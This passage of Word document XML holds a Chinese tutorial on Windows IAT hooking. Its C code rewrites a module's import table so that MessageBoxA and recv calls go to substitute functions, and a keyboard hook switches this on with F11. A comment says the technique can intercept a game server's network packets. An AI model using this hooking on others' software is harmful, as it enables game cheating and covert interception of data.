      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入库在输入数据段中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIMAGE_IMPORT_DESCRIPTOR pImportDesc = LocationIAT(hModule, szImportMod); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if (pImportDesc == NULL) return FALSE; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIMAGE_THUNK_DATA pOrigThunk = (PIMAGE_THUNK_DATA)((DWORD)hModule + (DWORD)(pImportDesc-&gt;OriginalFirstThunk)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIMAGE_THUNK_DATA pRealThunk = (PIMAGE_THUNK_DATA)((DWORD)hModule + (DWORD)(pImportDesc-&gt;FirstThunk)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环查找被截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项，并使用替代函数地址修改其值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">while(pOrigThunk-&gt;u1.Function) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">if((pOrigThunk-&gt;u1.Ordinal &amp; IMAGE_ORDINAL_FLAG) &amp;#33;= IMAGE_ORDINAL_FLAG) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项所描述的函数名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIMAGE_IMPORT_BY_NAME pByName =(PIMAGE_IMPORT_BY_NAME)((DWORD)hModule+(DWORD)(pOrigThunk-&gt;u1.AddressOfData)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if(pByName-&gt;Name[0] == &amp;#39;\0&amp;#39;) return FALSE; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测是否为挡截函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">if(strcmpi(pHookApi-&gt;szFunc, (char*)pByName-&gt;Name) == 0) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MEMORY_BASIC_INFORMATION mbi_thunk;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询修改页的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualQuery(pRealThunk, &amp;mbi_thunk, sizeof(MEMORY_BASIC_INFORMATION)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改变修改页保护属性为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PAGE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualProtect(mbi_thunk.BaseAddress,mbi_thunk.RegionSize, PAGE_READWRITE, &amp;mbi_thunk.Protect); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存原来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if(pHookApi-&gt;pOldProc == NULL) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">pHookApi-&gt;pOldProc = (PROC)pRealThunk-&gt;u1.Function; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项内容为替代函数地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">pRealThunk-&gt;u1.Function = (PDWORD)pHookApi-&gt;pNewProc; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复修改页保护属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">DWORD dwOldProtect; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualProtect(mbi_thunk.BaseAddress, mbi_thunk.RegionSize, mbi_thunk.Protect, &amp;dwOldProtect); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> } </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pOrigThunk++; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pRealThunk++; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetLastError(ERROR_SUCCESS); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置错误为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，表示成功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">return TRUE; </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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义替代函数，此实例中只给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MessageBoxA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行挡截。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static int WINAPI MessageBoxA1 (HWND hWnd , LPCTSTR lpText, LPCTSTR lpCaption, UINT uType)</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过滤掉原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MessageBoxA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的正文和标题内容，只显示如下内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">return MessageBox(hWnd, "Hook API OK&amp;#33;", "Hook API", uType);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static int WINAPI recv1(SOCKET s, char FAR *buf, int len, int flags )</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此处可以挡截游戏服务器发送来的网络数据包，可以加入分析和处理数据代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return recv(s,buf,len,flags);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(5) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KeyboardProc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中加入激活挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if( wParam == 0X79 )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句中后面加入如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当激活</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键时，启动挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else if( wParam == 0x7A )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOKAPI api[2];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api[0].szFunc ="MessageBoxA";//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置被挡截函数的名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api[0].pNewProc = (PROC)MessageBoxA1;//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置替代函数的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api[1].szFunc ="recv";//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置被挡截函数的名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api[1].pNewProc = (PROC)recv1; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置替代函数的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
